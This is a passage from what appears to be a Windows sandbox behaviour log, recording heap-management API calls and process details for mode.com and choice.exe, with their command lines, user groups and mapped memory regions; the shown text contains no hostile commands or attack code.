(hKey=0x80) returned 0x0 [0180.039] GetProcessHeap () returned 0x21404080000 [0180.039] GetProcessHeap () returned 0x21404080000 [0180.039] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404088f20) returned 1 [0180.039] GetProcessHeap () returned 0x21404080000 [0180.039] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404088f20) returned 0x22 [0180.040] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404088f20) returned 1 [0180.040] GetProcessHeap () returned 0x21404080000 [0180.040] GetProcessHeap () returned 0x21404080000 [0180.040] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x214040807e0) returned 1 [0180.040] GetProcessHeap () returned 0x21404080000 [0180.040] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x214040807e0) returned 0x18 [0180.040] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x214040807e0) returned 1 [0180.040] GetProcessHeap () returned 0x21404080000 [0180.040] GetProcessHeap () returned 0x21404080000 [0180.040] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404088ef0) returned 1 [0180.040] GetProcessHeap () returned 0x21404080000 [0180.040] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404088ef0) returned 0x20 [0180.040] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404088ef0) returned 1 [0180.040] GetProcessHeap () returned 0x21404080000 [0180.040] GetProcessHeap () returned 0x21404080000 [0180.040] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404089d00) returned 1 [0180.040] GetProcessHeap () returned 0x21404080000 [0180.040] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404089d00) returned 0x1000 [0180.041] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404089d00) returned 1 [0180.041] GetProcessHeap () returned 0x21404080000 [0180.041] GetProcessHeap () returned 0x21404080000 [0180.041] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404080800) returned 1 [0180.041] GetProcessHeap () returned 0x21404080000 [0180.041] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404080800) returned 0x18 [0180.041] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404080800) returned 1 [0180.041] GetProcessHeap () returned 0x21404080000 [0180.041] GetProcessHeap () returned 0x21404080000 [0180.041] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404088ec0) returned 1 [0180.041] GetProcessHeap () returned 0x21404080000 [0180.041] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404088ec0) returned 0x20 [0180.041] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404088ec0) returned 1 [0180.041] GetProcessHeap () returned 0x21404080000 [0180.042] GetProcessHeap () returned 0x21404080000 [0180.042] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x214040848e0) returned 1 [0180.042] GetProcessHeap () returned 0x21404080000 [0180.042] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x214040848e0) returned 0x9c [0180.042] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x214040848e0) returned 1 [0180.042] GetProcessHeap () returned 0x21404080000 [0180.042] GetProcessHeap () returned 0x21404080000 [0180.042] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404084a40) returned 1 [0180.042] GetProcessHeap () returned 0x21404080000 [0180.042] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404084a40) returned 0x18 [0180.042] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404084a40) returned 1 [0180.042] GetProcessHeap () returned 0x21404080000 [0180.042] GetProcessHeap () returned 0x21404080000 [0180.042] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404089010) returned 1 [0180.042] GetProcessHeap () returned 0x21404080000 [0180.042] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404089010) returned 0x20 [0180.043] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404089010) returned 1 [0180.043] GetProcessHeap () returned 0x21404080000 [0180.043] GetProcessHeap () returned 0x21404080000 [0180.043] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404089220) returned 1 [0180.043] GetProcessHeap () returned 0x21404080000 [0180.043] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404089220) returned 0x1e [0180.043] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404089220) returned 1 [0180.043] GetProcessHeap () returned 0x21404080000 [0180.043] GetProcessHeap () returned 0x21404080000 [0180.043] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404084a20) returned 1 [0180.043] GetProcessHeap () returned 0x21404080000 [0180.043] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404084a20) returned 0x18 [0180.043] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404084a20) returned 1 [0180.043] GetProcessHeap () returned 0x21404080000 [0180.043] GetProcessHeap () returned 0x21404080000 [0180.043] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x214040891c0) returned 1 [0180.043] GetProcessHeap () returned 0x21404080000 [0180.043] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x214040891c0) returned 0x20 [0180.044] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x214040891c0) returned 1 [0180.044] GetProcessHeap () returned 0x21404080000 [0180.044] GetProcessHeap () returned 0x21404080000 [0180.044] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404085210) returned 1 [0180.044] GetProcessHeap () returned 0x21404080000 [0180.044] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404085210) returned 0x2 [0180.044] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404085210) returned 1 [0180.044] GetProcessHeap () returned 0x21404080000 [0180.044] GetProcessHeap () returned 0x21404080000 [0180.044] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404084dc0) returned 1 [0180.044] GetProcessHeap () returned 0x21404080000 [0180.044] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404084dc0) returned 0x20 [0180.044] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404084dc0) returned 1 [0180.044] GetProcessHeap () returned 0x21404080000 [0180.044] GetProcessHeap () returned 0x21404080000 [0180.044] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404084df0) returned 1 [0180.044] GetProcessHeap () returned 0x21404080000 [0180.044] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404084df0) returned 0x20 [0180.045] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404084df0) returned 1 [0180.045] GetProcessHeap () returned 0x21404080000 [0180.045] GetProcessHeap () returned 0x21404080000 [0180.045] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404084e20) returned 1 [0180.045] GetProcessHeap () returned 0x21404080000 [0180.045] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404084e20) returned 0x20 [0180.045] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404084e20) returned 1 [0180.045] GetProcessHeap () returned 0x21404080000 [0180.045] GetProcessHeap () returned 0x21404080000 [0180.045] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404088f50) returned 1 [0180.045] GetProcessHeap () returned 0x21404080000 [0180.045] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404088f50) returned 0x20 [0180.046] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404088f50) returned 1 [0180.046] GetProcessHeap () returned 0x21404080000 [0180.046] GetProcessHeap () returned 0x21404080000 [0180.046] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404085230) returned 1 [0180.046] GetProcessHeap () returned 0x21404080000 [0180.046] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404085230) returned 0x18 [0180.046] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404085230) returned 1 [0180.046] GetProcessHeap () returned 0x21404080000 [0180.046] GetProcessHeap () returned 0x21404080000 [0180.046] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404089070) returned 1 [0180.046] GetProcessHeap () returned 0x21404080000 [0180.046] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404089070) returned 0x20 [0180.046] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404089070) returned 1 [0180.046] GetProcessHeap () returned 0x21404080000 [0180.046] GetProcessHeap () returned 0x21404080000 [0180.047] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404088f80) returned 1 [0180.047] GetProcessHeap () returned 0x21404080000 [0180.047] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404088f80) returned 0x20 [0180.047] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404088f80) returned 1 [0180.047] GetProcessHeap () returned 0x21404080000 [0180.047] GetProcessHeap () returned 0x21404080000 [0180.047] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404088fb0) returned 1 [0180.047] GetProcessHeap () returned 0x21404080000 [0180.047] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404088fb0) returned 0x20 [0180.047] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404088fb0) returned 1 [0180.047] GetProcessHeap () returned 0x21404080000 [0180.047] GetProcessHeap () returned 0x21404080000 [0180.048] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404089190) returned 1 [0180.048] GetProcessHeap () returned 0x21404080000 [0180.048] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404089190) returned 0x20 [0180.048] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404089190) returned 1 [0180.048] GetProcessHeap () returned 0x21404080000 [0180.048] GetProcessHeap () returned 0x21404080000 [0180.048] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404084e50) returned 1 [0180.048] GetProcessHeap () returned 0x21404080000 [0180.048] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404084e50) returned 0x18 [0180.048] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404084e50) returned 1 [0180.048] GetProcessHeap () returned 0x21404080000 [0180.048] GetProcessHeap () returned 0x21404080000 [0180.048] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x214040891f0) returned 1 [0180.048] GetProcessHeap () returned 0x21404080000 [0180.048] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x214040891f0) returned 0x20 [0180.049] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x214040891f0) returned 1 [0180.049] GetProcessHeap () returned 0x21404080000 [0180.049] GetProcessHeap () returned 0x21404080000 [0180.049] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404088fe0) returned 1 [0180.049] GetProcessHeap () returned 0x21404080000 [0180.049] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404088fe0) returned 0x20 [0180.049] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404088fe0) returned 1 [0180.049] GetProcessHeap () returned 0x21404080000 [0180.049] GetProcessHeap () returned 0x21404080000 [0180.049] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404089160) returned 1 [0180.049] GetProcessHeap () returned 0x21404080000 [0180.049] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404089160) returned 0x20 [0180.050] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404089160) returned 1 [0180.050] GetProcessHeap () returned 0x21404080000 [0180.050] GetProcessHeap () returned 0x21404080000 [0180.050] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404089130) returned 1 [0180.050] GetProcessHeap () returned 0x21404080000 [0180.050] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404089130) returned 0x20 [0180.050] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404089130) returned 1 [0180.050] GetProcessHeap () returned 0x21404080000 [0180.050] GetProcessHeap () returned 0x21404080000 [0180.050] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404084cd0) returned 1 [0180.050] GetProcessHeap () returned 0x21404080000 [0180.050] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404084cd0) returned 0x18 [0180.050] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404084cd0) returned 1 [0180.051] GetProcessHeap () returned 0x21404080000 [0180.051] GetProcessHeap () returned 0x21404080000 [0180.051] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x21404089040) returned 1 [0180.051] GetProcessHeap () returned 0x21404080000 [0180.051] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x21404089040) returned 0x20 [0180.051] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x21404089040) returned 1 [0180.051] GetProcessHeap () returned 0x21404080000 [0180.051] GetProcessHeap () returned 0x21404080000 [0180.051] HeapValidate (hHeap=0x21404080000, dwFlags=0x0, lpMem=0x214040851f0) returned 1 [0180.051] GetProcessHeap () returned 0x21404080000 [0180.051] RtlSizeHeap (HeapHandle=0x21404080000, Flags=0x0, MemoryPointer=0x214040851f0) returned 0x18 [0180.051] RtlFreeHeap (HeapHandle=0x21404080000, Flags=0x0, BaseAddress=0x214040851f0) returned 1 [0180.051] exit (_Code=0) Thread: id = 88 os_tid = 0xef0 Process: id = "27" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x5044b000" os_pid = "0xf08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "mode 76, 30" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1601 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1602 start_va = 0x15bb600000 end_va = 0x15bb7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000015bb600000" filename = "" Region: id = 1603 start_va = 0x15bb800000 end_va = 0x15bb87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000015bb800000" filename = "" Region: id = 1604 start_va = 0x1c4b8870000 end_va = 0x1c4b888ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b8870000" filename = "" Region: id = 1605 start_va = 0x1c4b8890000 end_va = 0x1c4b88a4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001c4b8890000" filename = "" Region: id = 1606 start_va = 0x1c4b88b0000 end_va = 0x1c4b88b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001c4b88b0000" filename = "" Region: id = 1607 start_va = 0x1c4b88c0000 end_va = 0x1c4b88c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001c4b88c0000" filename = "" Region: id = 1608 start_va = 0x1c4b88d0000 end_va = 0x1c4b88d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b88d0000" filename = "" Region: id = 1609 start_va = 0x7df5ffa00000 end_va = 0x7ff5ff9fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa00000" filename = "" Region: id = 1610 start_va = 0x7ff79ae80000 end_va = 0x7ff79aea2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff79ae80000" filename = "" Region: id = 1611 start_va = 0x7ff79bc40000 end_va = 0x7ff79bc4bfff monitored = 0 entry_point = 0x7ff79bc45190 region_type = mapped_file name = "mode.com" filename = "\\Windows\\System32\\mode.com" (normalized: "c:\\windows\\system32\\mode.com") Region: id = 1612 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1613 start_va = 0x1c4b88e0000 end_va = 0x1c4b8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b88e0000" filename = "" Region: id = 1614 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1615 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1616 start_va = 0x1c4b8870000 end_va = 0x1c4b887ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001c4b8870000" filename = "" Region: id = 1617 start_va = 0x7ff79ad80000 end_va = 0x7ff79ae7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff79ad80000" filename = "" Region: id = 1618 start_va = 0x1c4b88e0000 end_va = 0x1c4b899dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1619 start_va = 0x1c4b89e0000 end_va = 0x1c4b8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b89e0000" filename = "" Region: id = 1620 start_va = 0x15bb880000 end_va = 0x15bb8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000015bb880000" filename = "" Region: id = 1621 start_va = 0x7ffbead60000 end_va = 0x7ffbeaeb5fff monitored = 0 entry_point = 0x7ffbead6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1622 start_va = 0x7ffbeb9f0000 end_va = 0x7ffbebb75fff monitored = 0 entry_point = 0x7ffbeba3ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1623 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1624 start_va = 0x7ffbe1690000 end_va = 0x7ffbe16c1fff monitored = 0 entry_point = 0x7ffbe169d480 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 1625 start_va = 0x7ffbe3470000 end_va = 0x7ffbe347bfff monitored = 0 entry_point = 0x7ffbe3474d30 region_type = mapped_file name = "ureg.dll" filename = "\\Windows\\System32\\ureg.dll" (normalized: "c:\\windows\\system32\\ureg.dll") Region: id = 1626 start_va = 0x7ffbeaff0000 end_va = 0x7ffbeb096fff monitored = 0 entry_point = 0x7ffbeb0058d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1627 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1628 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1629 start_va = 0x1c4b8880000 end_va = 0x1c4b8886fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b8880000" filename = "" Region: id = 1630 start_va = 0x1c4b8ae0000 end_va = 0x1c4b8b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b8ae0000" filename = "" Region: id = 1631 start_va = 0x1c4b89a0000 end_va = 0x1c4b89a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b89a0000" filename = "" Region: id = 1632 start_va = 0x1c4b8ae0000 end_va = 0x1c4b8b18fff monitored = 0 entry_point = 0x1c4b8ae12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1633 start_va = 0x1c4b8b70000 end_va = 0x1c4b8b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b8b70000" filename = "" Region: id = 1634 start_va = 0x1c4b8b80000 end_va = 0x1c4b8d07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001c4b8b80000" filename = "" Region: id = 1635 start_va = 0x7ffbed920000 end_va = 0x7ffbed95afff monitored = 0 entry_point = 0x7ffbed9212f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1636 start_va = 0x1c4b8d10000 end_va = 0x1c4b8e90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001c4b8d10000" filename = "" Region: id = 1637 start_va = 0x1c4b8ea0000 end_va = 0x1c4ba29ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001c4b8ea0000" filename = "" Region: id = 1638 start_va = 0x1c4b89b0000 end_va = 0x1c4b89b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b89b0000" filename = "" Region: id = 1639 start_va = 0x1c4b89c0000 end_va = 0x1c4b89c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001c4b89c0000" filename = "" Region: id = 1640 start_va = 0x7ffbe1860000 end_va = 0x7ffbe186dfff monitored = 0 entry_point = 0x7ffbe18645b0 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\System32\\fsutilext.dll" (normalized: "c:\\windows\\system32\\fsutilext.dll") Thread: id = 90 os_tid = 0xf14 Thread: id = 91 os_tid = 0xf18 Process: id = "28" image_name = "choice.exe" filename = "c:\\windows\\system32\\choice.exe" page_root = "0x2d2b9000" os_pid = "0xf34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "choice /C:123456780 /N" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1643 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1644 start_va = 0x8585100000 end_va = 0x858517ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008585100000" filename = "" Region: id = 1645 start_va = 0x8585200000 end_va = 0x85853fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008585200000" filename = "" Region: id = 1646 start_va = 0x230aba30000 end_va = 0x230aba4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230aba30000" filename = "" Region: id = 1647 start_va = 0x230aba50000 end_va = 0x230aba64fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000230aba50000" filename = "" Region: id = 1648 start_va = 0x230aba70000 end_va = 0x230aba73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000230aba70000" filename = "" Region: id = 1649 start_va = 0x230aba80000 end_va = 0x230aba80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000230aba80000" filename = "" Region: id = 1650 start_va = 0x230aba90000 end_va = 0x230aba91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230aba90000" filename = "" Region: id = 1651 start_va = 0x7df5ffa40000 end_va = 0x7ff5ffa3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa40000" filename = "" Region: id = 1652 start_va = 0x7ff794a90000 end_va = 0x7ff794ab2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff794a90000" filename = "" Region: id = 1653 start_va = 0x7ff7957a0000 end_va = 0x7ff7957acfff monitored = 0 entry_point = 0x7ff7957a6140 region_type = mapped_file name = "choice.exe" filename = "\\Windows\\System32\\choice.exe" (normalized: "c:\\windows\\system32\\choice.exe") Region: id = 1654 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1655 start_va = 0x230abaa0000 end_va = 0x230abbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000230abaa0000" filename = "" Region: id = 1656 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1657 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1658 start_va = 0x230aba30000 end_va = 0x230aba3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000230aba30000" filename = "" Region: id = 1659 start_va = 0x7ff794990000 end_va = 0x7ff794a8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff794990000" filename = "" Region: id = 1660 start_va = 0x230abbb0000 end_va = 0x230abc6dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1661 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1662 start_va = 0x8585180000 end_va = 0x85851fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008585180000" filename = "" Region: id = 1663 start_va = 0x7ffbead60000 end_va = 0x7ffbeaeb5fff monitored = 0 entry_point = 0x7ffbead6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1664 start_va = 0x7ffbeb9f0000 end_va = 0x7ffbebb75fff monitored = 0 entry_point = 0x7ffbeba3ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1665 start_va = 0x7ffbed7a0000 end_va = 0x7ffbed80afff monitored = 0 entry_point = 0x7ffbed7b90c0 region_type = mapped_file name = "ws2_32.dll" filename = 